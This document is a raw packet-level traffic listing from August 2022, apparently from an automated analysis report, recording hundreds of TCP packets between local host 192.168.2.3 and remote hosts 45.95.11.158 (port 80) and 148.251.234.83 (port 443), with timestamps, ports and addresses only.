Aug 23, 2022 03:42:49.446038961 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.446063995 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.446077108 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.446086884 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.446108103 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.446118116 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.446125031 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.446146965 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.446163893 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.446181059 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.446191072 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.446208954 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.446219921 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.446228027 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.446254969 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.446257114 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.446263075 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.446293116 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.456839085 CEST	443	49768	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:49.456978083 CEST	443	49768	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:49.457063913 CEST	49768	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:49.480559111 CEST	49768	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:49.480591059 CEST	443	49768	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:49.532390118 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.532551050 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.567222118 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.567305088 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.567379951 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.567420959 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.567460060 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.567468882 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.567477942 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.567502022 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.567519903 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.567543983 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.567563057 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.567606926 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.567620993 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.567662954 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.567682028 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.567723036 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.567745924 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.567790031 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.567811012 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.567853928 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.567876101 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.567918062 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.567938089 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.567981005 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.568010092 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.568057060 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.568063021 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.568105936 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.568108082 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.568161964 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.568173885 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.568207979 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.568217993 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.568264008 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.568284035 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.568327904 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.568341017 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.568387032 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.568388939 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.568434000 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.568450928 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.568476915 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.568491936 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.568555117 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.568557024 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.568607092 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.568614960 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.568660975 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.568670034 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.568702936 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.568718910 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.568742037 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.568747997 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.568788052 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.568789959 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.568829060 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.568839073 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.568875074 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.568878889 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.568906069 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.568919897 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.568941116 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.568947077 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.568984032 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.568989992 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.569020987 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.569026947 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.569058895 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.569068909 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.569088936 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.569099903 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.569123030 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.569128990 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.569160938 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.569164991 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.569207907 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.569209099 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.569283009 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.569291115 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.569328070 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.569334030 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.569359064 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.569390059 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.569408894 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.569417953 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.569425106 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.569433928 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.569447994 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.569473028 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.569478035 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.569493055 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.569508076 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.569542885 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.569557905 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.569566011 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.569586039 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.569621086 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.569622040 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.569653988 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.569679976 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.569684982 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.569685936 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.569694042 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.569720984 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.569749117 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.569750071 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.569818974 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.569824934 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.569842100 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.569873095 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.569884062 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.569901943 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.569931030 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.569932938 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.569958925 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.569960117 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.569974899 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.569989920 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.570003033 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.570020914 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.570034981 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.570050955 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.570075989 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.570080996 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.570096016 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.570111990 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.570122004 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.570142031 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.570159912 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.570172071 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.570187092 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.570200920 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.570207119 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.570231915 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.570251942 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.570260048 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.570271015 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.570291042 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.570305109 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.570319891 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.570332050 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.570357084 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.570379972 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.570400953 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.570422888 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.570449114 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.570482016 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.570516109 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.570559978 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.570563078 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.570591927 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.570611000 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.570616961 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.570655107 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.570689917 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.570698977 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.570703030 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.570743084 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.570775032 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.570806980 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.570842981 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.570878983 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.570888996 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.570926905 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.570928097 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.570941925 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.570971012 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.570980072 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.571013927 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.571019888 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.571058035 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.571059942 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.571109056 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.571144104 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.571176052 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.571213007 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.571254015 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.571258068 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.571276903 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.571295023 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.571331024 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.571332932 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.571366072 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.571381092 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.571394920 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.571436882 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.571444988 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.571479082 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.571479082 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.571525097 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.571532011 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.571574926 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.571611881 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.571640968 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.571664095 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.571695089 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.571702003 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.571723938 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.571729898 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.571755886 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.571763039 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.571800947 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.571803093 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.571841002 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.571849108 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.571886063 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.571894884 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.571907043 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.571938038 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.571942091 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.571979046 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.571985960 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.572021008 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.572025061 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.572062969 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.572073936 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.572103024 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.572104931 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.572148085 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.572159052 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.572184086 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.572191954 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.572221994 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.572227955 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.572252035 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.572266102 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.572293043 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.572293043 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.572331905 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.572345972 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.572371960 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.572391987 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.572446108 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.572448969 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.572480917 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.572493076 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.572510004 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.572520971 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.572560072 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.572560072 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.572602034 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.572602987 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.572643995 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.572648048 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.572695971 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.572711945 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.572746992 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.572761059 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.572776079 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.572797060 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.572814941 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.572819948 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.572845936 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.572865009 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.572873116 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.572889090 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.572901964 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.572921038 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.572942019 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.572957039 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.572983027 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.572989941 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.573014975 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.573035002 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.573043108 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.573056936 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.573081017 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.573081970 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.573112011 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.573132038 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.573139906 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.573154926 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.573169947 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.573183060 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.573209047 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.573216915 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.573239088 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.573256016 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.573267937 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.573287010 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.573307991 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.573321104 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.573338032 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.573352098 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.573364973 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.573381901 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.573395014 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.573411942 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.573426008 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.573441029 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.573466063 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.573479891 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.573493958 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.573512077 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.573529005 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.573540926 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.573563099 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.573573112 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.573591948 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.573611021 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.573621035 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.573637009 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.573649883 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.573662996 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.573678970 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.573694944 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.573718071 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.573724985 CEST	49774	80	192.168.2.3	45.95.11.158
